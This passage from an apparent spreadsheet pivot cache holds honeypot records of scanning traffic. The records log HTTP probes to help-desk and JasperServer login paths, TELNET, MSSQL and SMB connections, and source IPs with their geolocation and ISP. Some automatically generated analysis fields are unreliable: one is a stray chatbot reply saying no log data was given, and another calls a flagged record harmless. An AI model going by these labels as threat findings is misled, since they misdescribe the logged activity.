AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.113.68.70', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '156.244.37.11', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.42.176', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.255.123.181', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.79.122', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '193.57.136.113', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/helpdesk/WebObjects/Helpdesk.woa'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.181.21.224', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.63.23', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.182.38.84', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '5.253.43.207', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '77.91.74.218', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '45.14.244.111', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '193.57.136.113', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.171.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.234.67.80', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.113.33', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.115.66', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.224.106', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.118.77', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.79.122', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/jasperserver-pro/login.html'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'method': 'GET', 'uri': '/login.html'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9b4:8c6a"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="The attacker is scanning and attempting to exploit various services on the targeted network, likely as part of a reconnaissance or enumeration phase to identify potential entry points."/>
    <s v=" Credential stuffing, brute force attacks, SQL injection"/>
  </r>
  <r>
    <x v="900"/>
    <x v="900"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T17:24:51"/>
    <d v="2025-03-25T19:26:51"/>
    <d v="2025-04-24T17:24:51"/>
    <n v="515"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA&amp;&amp;47768&amp;&amp;58544"/>
    <s v="True"/>
    <s v="{'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['spam']}"/>
    <n v="70"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="NA"/>
    <s v="Istanbul"/>
    <s v="745044"/>
    <s v="34122"/>
    <s v="41.0082"/>
    <s v="28.9784"/>
    <s v="208287"/>
    <s v="DC Host INC"/>
    <s v="DC Host INC"/>
    <s v="cellular"/>
    <s v="DC HOST Inc"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d809:e3f5"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <s v="The log data suggests a lack of activity from malicious actors, as there is no recorded information to indicate any suspicious behavior or attempts to exploit services. This implies that no malicious activities have been detected so far. The absence of such records is normal for an active monitoring system with no reported incidents."/>
    <s v="I'm ready when you are! However, it seems like there's no log data provided. If you could provide the actual log data, I'd be happy to analyze and identify the types of attacks for you."/>
  </r>
  <r>
    <x v="901"/>
    <x v="901"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T17:10:49"/>
    <d v="2025-04-03T15:01:46"/>
    <d v="2025-04-24T17:10:49"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="NG"/>
    <s v="Nigeria"/>
    <s v="AK"/>
    <s v="Akwa Ibom State"/>
    <s v="Uyo"/>
    <s v="Uyo"/>
    <s v="2319480"/>
    <s v="NA"/>
    <s v="5.05127"/>
    <s v="7.9335"/>
    <s v="329244"/>
    <s v="Connect, Surf and Smile Limited"/>
    <s v="Connect, Surf and Smile Limited"/>
    <s v="business"/>
    <s v="Connect, Surf and Smile Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:66d4:2937"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="902"/>
    <x v="902"/>
    <s v="NA&amp;&amp;125-227-109-170.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-24T16:36:35"/>
    <d v="2025-03-18T13:56:39"/>
    <d v="2025-04-24T16:36:35"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;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7de3:6daa"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="903"/>
    <x v="903"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T16:10:25"/>
    <d v="2024-01-09T15:56:00"/>
    <d v="2025-04-24T16:10:25"/>
    <n v="281"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="&amp;&amp;SMA-LAB_MSSQL_H3&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_MSSQL_H6&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H30"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="SS"/>
    <s v="South Sudan"/>
    <s v="EC"/>
    <s v="Central Equatoria"/>
    <s v="NA"/>
    <s v="Juba"/>
    <s v="373303"/>
    <s v="NA"/>
    <s v="4.85165"/>
    <s v="31.5825"/>
    <s v="327786"/>
    <s v="4G Telecom"/>
    <s v="4GTelecomS3"/>
    <s v="cellular"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (169.255.26.53,49736)}&amp;&amp;{Data_SMB:Incoming connection (169.255.26.53,49921)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (169.255.26.53,54049)}&amp;&amp;{Data_SMB:Incoming connection (169.255.26.53,54112)}&amp;&amp;{Data_SMB:Incoming connection (169.255.26.53,54176)}&amp;&amp;{Data_SMB:Incoming connection (169.255.26.53,54213)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (169.255.26.53,53651)}&amp;&amp;{Data_SMB:Incoming connection (169.255.26.53,53693)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (169.255.26.53,53515)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a9ff:1a35"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Potential malicious activity is a remote system attempting to connect to a vulnerable SMB service from an unusual IP address. This could be a sign of exploitation or unauthorized access attempt. The unusual port number and IP address add to the suspicious nature of this event. &amp;&amp; Unsolicited incoming SMB connection from an unknown IP address suggests potential malware scanning or exploitation attempt of the system's shared resources. _x000a_The attacker may be probing for vulnerable services or attempting to establish a backdoor connection. This activity could also indicate a brute-force attack on account credentials."/>
    <s v="SMB Attack &amp;&amp; Port Scan"/>
  </r>
  <r>
    <x v="904"/>
    <x v="904"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T15:42:52"/>
    <d v="2025-01-23T17:42:29"/>
    <d v="2025-04-24T15:42:52"/>
    <n v="61"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433&amp;&amp;58726&amp;&amp;58752"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MP"/>
    <s v="Madhya Pradesh"/>
    <s v="Jabalpur"/>
    <s v="Jabalpur"/>
    <s v="1269633"/>
    <s v="482011"/>
    <s v="23.1686"/>
    <s v="79.9339"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Ltd"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="1989-01-06"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2ff7:d472"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attacker is attempting to gather information about the network and its services, possibly as a reconnaissance step before launching a more targeted attack. They are scanning for open ports and trying various protocols and credentials to see what they can access."/>
    <s v=" Port scanning and Reconnaissance"/>
  </r>
  <r>
    <x v="905"/>
